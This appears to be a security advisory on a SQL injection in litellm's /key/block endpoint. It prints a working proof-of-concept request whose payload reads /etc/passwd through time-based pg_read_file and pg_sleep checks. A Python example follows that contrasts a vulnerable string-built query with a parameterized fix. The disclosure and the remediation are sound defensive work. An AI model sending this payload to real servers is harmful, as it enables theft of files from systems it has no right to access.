Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
There is no fixed version for litellm.
litellm is a library for easily interfacing with LLM API providers.
Affected versions of this package are vulnerable to SQL Injection via the /key/block endpoint. The value of the key field in the request body reaches a PostgreSQL query without being treated as data, so a proxy_admin_viewer user can use a blind, time-based condition (pg_read_file combined with pg_sleep) to retrieve the contents of arbitrary files on the target filesystem by brute-forcing them one character at a time.
POST /key/block HTTP/1.1
Host: 127.0.0.1:4000
Content-Length: 115
Authorization: Bearer sk-5pUqaVXkY6DaR1zEKKnwwA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/json
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"key": "1'|| CASE WHEN pg_read_file('/etc/passwd', 0, 1) = 'r' THEN pg_sleep(10) ELSE pg_sleep(0) END; -- -"
}
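The two query-construction patterns behind this bug class, as an added illustration that is not litellm's own code: the vulnerable function interpolates the JSON key value into the SQL text, the hardened one binds it as a parameter. The table name, its columns and the use of sqlite3 in place of PostgreSQL are assumptions; the payload is the one from the request above.

```python
import sqlite3

# Payload quoted from the advisory's PoC request; handled correctly, it is just an unknown token.
PAYLOAD = "1'|| CASE WHEN pg_read_file('/etc/passwd', 0, 1) = 'r' THEN pg_sleep(10) ELSE pg_sleep(0) END; -- -"


def _db():
    # Hypothetical schema standing in for the proxy's key table (sqlite3 used in place of PostgreSQL).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_keys (token TEXT PRIMARY KEY, blocked INTEGER NOT NULL DEFAULT 0)")
    conn.execute("INSERT INTO api_keys VALUES ('sk-example-key', 0)")
    conn.commit()
    return conn


def block_key_vulnerable(conn, key):
    """Interpolates the attacker-controlled key into the SQL text: the bug class described above."""
    sql = f"UPDATE api_keys SET blocked = 1 WHERE token = '{key}'"
    conn.execute(sql)
    return conn.execute("SELECT COUNT(*) FROM api_keys WHERE blocked = 1").fetchone()[0]


def block_key_safe(conn, key):
    """Binds key as a query parameter, so the driver never hands it to the SQL parser as code."""
    cur = conn.execute("UPDATE api_keys SET blocked = 1 WHERE token = ?", (key,))
    return cur.rowcount


def demo():
    # Vulnerable path: the quote in the payload closes the literal and the remainder is parsed as SQL.
    try:
        block_key_vulnerable(_db(), PAYLOAD)
        vuln_result = "executed"
    except sqlite3.OperationalError as exc:
        # sqlite has no pg_read_file/pg_sleep; the error shows the payload was parsed as SQL, not data.
        vuln_result = f"parsed as SQL: {exc}"
    # Hardened path: the payload is compared as an opaque string, matches no token, changes no rows.
    safe_rows = block_key_safe(_db(), PAYLOAD)
    # The hardened path still blocks a real key normally.
    legit_rows = block_key_safe(_db(), "sk-example-key")
    return vuln_result, safe_rows, legit_rows


if __name__ == "__main__":
    print(demo())
```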